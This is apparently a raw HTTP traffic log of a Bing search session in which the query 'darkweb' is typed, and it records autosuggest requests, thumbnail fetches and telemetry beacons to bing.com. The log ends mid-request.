GET https://www.bing.com/th?id=OSK.dvHHWJdGoGdGFChkeYSPHtliDKa1VaPsE9QLAy2I7eY&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.f230f91126f1fed48b53bc0925196f3e&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.72fd381818def5b8a5e2d3ce9dd54a61&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.cLp7JTM2eOqxUwtir0jyyglxBvVfsRhRCjZ-aVdPU_8&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.7VUIbBNHlEnXBsU04ajdFxWghEBdT5C2vltlZ6FukY8&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.417eed68ca852e632a0fe75c49d48f4d&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.dvHHWJdGoGdGFChkeYSPHtliDKa1VaPsE9QLAy2I7eY&w=175&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=da&cp=2&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Ad%2Ci%3A3%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306927199%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ad%2Ci%3A3%22%2C%22AsResponseLength%22%3A%221476%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306927294%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ad%2Ci%3A3%2Cig%3AD04BF9B920AA4D47B11E05BB4BD13DC3%22%2C%22AnswerInfo%22%3A%22MB%3B10%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306927295%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ad%2Ci%3A3%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306927298%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A1%2C%20%5C%22GL%5C%22%3A9%2C%20%5C%22IG%5C%22%3A%5C%22D04BF9B920AA4D47B11E05BB4BD13DC3%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306927298%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ada%2Ci%3A4%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306927706%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A2%2C%20%5C%22GL%5C%22%3A8%2C%20%5C%22IG%5C%22%3A%5C%22D04BF9B920AA4D47B11E05BB4BD13DC3%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306927706%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ada%2Ci%3A4%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306927731%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Ada%2Ci%3A4%22%2C%22AsResponseLength%22%3A%221278%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306927816%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Request

GET https://www.bing.com/th?id=OSK.TB_XMKsGXNkRt3-e-r9aXkgDhk10lDHn0oVh3wXCgaU&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.7cc66daae606f2031c0d35f439eb13e8&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.xXWYzOYGpFi-ELg3MCHjGSN05vc-J1XBfcGhQlgMcbI&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.07efcfd24d7a9077363e003bb00b89a0&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=dar&cp=3&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B

HTTP Response

200

HTTP Request

GET https://www.bing.com/th?id=OSK.a5a7afbf6a82d9e8d19ed94a499dcf14&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.6010d7846e469d63168a9874d6fa8238&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.1e74c5e14e5f343df1836a5392c5166d&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.0Rsn5LxsRVKwyD5cOYa9PWRO2169Us7Uic-TQ5gKuiI&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.a8badd1e8dc401fc426db757c36a2718&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=dark&cp=4&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Ada%2Ci%3A4%2Cig%3ABEC64CE383B54E22987E3EBF5D615810%22%2C%22AnswerInfo%22%3A%22MB%3B10%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306927816%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adar%2Ci%3A5%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306928050%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adar%2Ci%3A5%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306928051%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adar%2Ci%3A5%22%2C%22AsResponseLength%22%3A%221434%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306928184%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adar%2Ci%3A5%2Cig%3ACAEE35BFDB644C6E80DAED8E72E8274E%22%2C%22AnswerInfo%22%3A%22LS%3B11%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306928184%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adar%2Ci%3A5%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306928191%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A3%2C%20%5C%22GL%5C%22%3A8%2C%20%5C%22IG%5C%22%3A%5C%22CAEE35BFDB644C6E80DAED8E72E8274E%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306928191%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adark%2Ci%3A6%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306928330%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adark%2Ci%3A6%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306928339%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Request

GET https://www.bing.com/th?id=OSK.dAQoBR8Uc40XOZquuyugIz0rIAkAQsyzj3EkV4CcWwQ&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.32d60ee14c8186dc3e2ab68219472411&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.aa2b6ab42a9ef5e66708bf83c28be5b2&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.cd52ddf289423469b6254a25d63cb7db&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.04d92d50cf01519e83ffe1cce06d7d9a&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=darkw&cp=5&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Adark%2Ci%3A6%22%2C%22AsResponseLength%22%3A%221302%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306928430%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adark%2Ci%3A6%2Cig%3A7AF6F2526EF34F389F5C0667016445CF%22%2C%22AnswerInfo%22%3A%22AS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306928430%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adark%2Ci%3A6%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306928430%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A4%2C%20%5C%22GL%5C%22%3A4%2C%20%5C%22IG%5C%22%3A%5C%227AF6F2526EF34F389F5C0667016445CF%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306928430%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkw%2Ci%3A7%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306928902%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkw%2Ci%3A7%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306928902%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkw%2Ci%3A7%22%2C%22AsResponseLength%22%3A%221086%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306928987%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkw%2Ci%3A7%2Cig%3A0D03F80EB8DA493FBFD0E33D08DC7B58%22%2C%22AnswerInfo%22%3A%22OS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306928987%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkw%2Ci%3A7%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306928987%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Request

GET https://www.bing.com/th?id=OSK.d882b7c729ccce9d209733fe8e43f26a&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.jEcgrhmx-KYSCBdw0c82e5im5MG7FE8g2Oz62GYxQo8&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Request

GET https://www.bing.com/th?id=OSK.a25ee7a2d3812c3b3e9087b5430f36a0&w=120&h=120&qlt=90&c=6&rs=1&cdv=1&pid=RS

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=darkwe&cp=6&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A5%2C%20%5C%22GL%5C%22%3A3%2C%20%5C%22IG%5C%22%3A%5C%220D03F80EB8DA493FBFD0E33D08DC7B58%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306928987%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkwe%2Ci%3A8%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306929102%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkwe%2Ci%3A8%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306929139%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkwe%2Ci%3A8%22%2C%22AsResponseLength%22%3A%22430%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306929268%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkwe%2Ci%3A8%2Cig%3AA037B2EE115C4454A3DBE4C379F93DDF%22%2C%22AnswerInfo%22%3A%22OS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306929268%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkwe%2Ci%3A8%22%2C%22T%22%3A%22CI.GhostingLatency%22%2C%22TS%22%3A1733306929269%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A6%2C%20%5C%22GL%5C%22%3A5%2C%20%5C%22IG%5C%22%3A%5C%22A037B2EE115C4454A3DBE4C379F93DDF%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306929269%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%2Ci%3A9%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306929677%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Request

GET https://www.bing.com/AS/Suggestions?pt=page.serp&bq=onjon&mkt=en-gb&qry=darkweb&cp=7&csr=1&msbqf=false&pths=1&cvid=6AB2CD56EF6C4338BF41C655438BDF1B

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/ls.gif?IG=6AB2CD56EF6C4338BF41C655438BDF1B&Type=Event.ClientInst&DATA={%22T%22:%22CI.Unload%22,%22Name%22:%22D%22,%22AppNS%22:%22SERP%22,%22TS%22:1733306930371}&log=UserEvent

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=6AB2CD56EF6C4338BF41C655438BDF1B&TYPE=Event.ClientInst&DATA=%5B%7B%22Namespace%22%3A%22AutoSuggest%22%2C%22EventType%22%3A%22TextGhostingSuggest%22%2C%22CustomData%22%3A%22%7B%5C%22PL%5C%22%3A7%2C%20%5C%22GL%5C%22%3A4%2C%20%5C%22IG%5C%22%3A%5C%22A037B2EE115C4454A3DBE4C379F93DDF%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1733306929677%2C%22Name%22%3A%22Ghosting%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%2Ci%3A9%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306929717%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%2Ci%3A9%22%2C%22AsResponseLength%22%3A%22434%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306929862%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%2Ci%3A9%2Cig%3AC4C2BF1DBBC94019BA8F848A60AD7862%22%2C%22AnswerInfo%22%3A%22OS%3B8%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306929862%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

HTTP Request

GET https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=

HTTP Response

200

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

200

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx

HTTP Response

204

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:20,%22BC%22:513,%22SE%22:-1,%22TC%22:-1,%22H%22:578,%22BP%22:613,%22CT%22:614,%22IL%22:18},%22ad%22:[-1,-1,1263,601,1263,3469,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx?

HTTP Response

200

HTTP Response

204

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1733306931224%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%224.8%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1733306931224%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1733306931229%2C%22Name%22%3A707%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306931229%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306931231%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306931233%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}]

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%227%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]

HTTP Request

GET https://www.bing.com/images/sbi?mmasync=1&ig=202035EC43B64C3DBF7FE10F53408EC5&iid=.5097&ptn=Web&ep=0&iconpl=1

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306931244%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22601%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306931245%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306931249%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22Time%22%3A1275%2C%22time%22%3A1278%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1733306931651%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A1278%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306931651%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22micComponent%22%3A%22rendered%22%2C%22time%22%3A1279%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306931652%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

HTTP Response

200

HTTP Request

POST https://www.bing.com/rewardsapp/ncheader?ver=51619320&IID=SERP.5054&IG=202035EC43B64C3DBF7FE10F53408EC5

HTTP Response

200

HTTP Request

POST https://www.bing.com/rewardsapp/reportActivity?IG=202035EC43B64C3DBF7FE10F53408EC5&IID=SERP.5063&q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22fdbkans_0%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_tum13%22}]

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22thumb_f13%22}]

HTTP Response

200

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_feedback%22}]

HTTP Request

POST https://www.bing.com/fd/ls/lsp.aspx?

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22correlationId%22%3A%2267502a3b36cd4b05b5788c424e6c55fc%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306931656%2C%22Name%22%3A%22loadJsModule%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22correlationId%22%3A%2267502a3b36cd4b05b5788c424e6c55fc%22%2C%22T%22%3A%22CI.acclink%22%2C%22TS%22%3A1733306931656%2C%22Name%22%3A%22undirectflow%22%2C%22FID%22%3A%22init%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306931678%2C%22Name%22%3A%22Show%22%2C%22FID%22%3A%2214utojb6_14yb1dlu%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306931678%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22T%22%3A%22CI.OpalUpsell%22%2C%22TS%22%3A1733306931678%2C%22Name%22%3A%22overlap%22%2C%22FID%22%3A%22Hide%22%7D%2C%7B%22osBuildVersion%22%3A%5B%2210%22%2C%220%22%2C%2222000%22%5D%2C%22isWin11OrHigher%22%3A%22true%22%2C%22fullOsBuild%22%3A%2210.0.22000%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306931699%2C%22Name%22%3A%22OSBuild%22%2C%22FID%22%3A%22OSBuild%22%7D%2C%7B%22T%22%3A%22CI.Tab%22%2C%22TS%22%3A1733306931894%2C%22Name%22%3A%221%22%2C%22FID%22%3A%22count%22%7D%2C%7B%22SuppressingFeature%22%3A%22lgVidAns%22%2C%22T%22%3A%22CI.LeftGutterUtility%22%2C%22TS%22%3A1733306931962%2C%22Name%22%3A%22LGSuppressed%22%2C%22FID%22%3A%22lgVidAns%22%7D%2C%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306932099%2C%22Name%22%3A%22PromptDevLoc%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1733306932099%2C%22Name%22%3A%22Perm_Available%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

HTTP Request

GET https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22Text%22%3A%220%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22web%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%221%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22conv%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%222%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22shop%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%223%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1733306932128%2C%22Name%22%3A%22images%22%2C%22FID%22%3A%22DynScopeRank%22%7D%2C%7B%22Text%22%3A%224%22%2C%22T%22%3A%22CI.Info%22%2C%22